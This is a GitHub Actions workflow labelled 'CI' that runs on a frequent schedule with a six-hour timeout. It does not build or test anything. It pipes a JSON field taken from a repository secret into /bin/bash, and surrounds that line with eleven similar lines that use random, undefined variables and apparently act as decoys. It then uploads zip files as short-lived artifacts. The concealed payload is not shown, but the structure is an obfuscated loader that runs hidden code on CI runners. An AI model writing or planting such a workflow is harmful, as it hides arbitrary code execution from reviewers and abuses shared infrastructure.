name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '13 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          u075: ${{ secrets.u075 }}
        run: |
          printf '%s' "$u075" | jq -r .fbh6 | /bin/bash
          echo $yiv68607 | jq -r .huqij31958 | /bin/bash
          printf '%s' "$mqy25" | jq -r .rq6 | /bin/bash
          echo $xu3 | jq -r .evnuw93 | /bin/bash
          echo $cxm053 | jq -r .a9432 | /bin/bash
          printf '%s' "$av890" | jq -r .bddd1 | /bin/bash
          echo $npjn5109 | jq -r .l7 | /bin/bash
          echo $vbuv5 | jq -r .pro739 | /bin/bash
          printf '%s' "$g035" | jq -r .gde41 | /bin/bash
          echo $d068 | jq -r .d227 | /bin/bash
          echo $expu049 | jq -r .ezp88593 | /bin/bash
          echo $iivss9770 | jq -r .w217 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: 3VDJJlon
          path: "*.zip"
          retention-days: 1
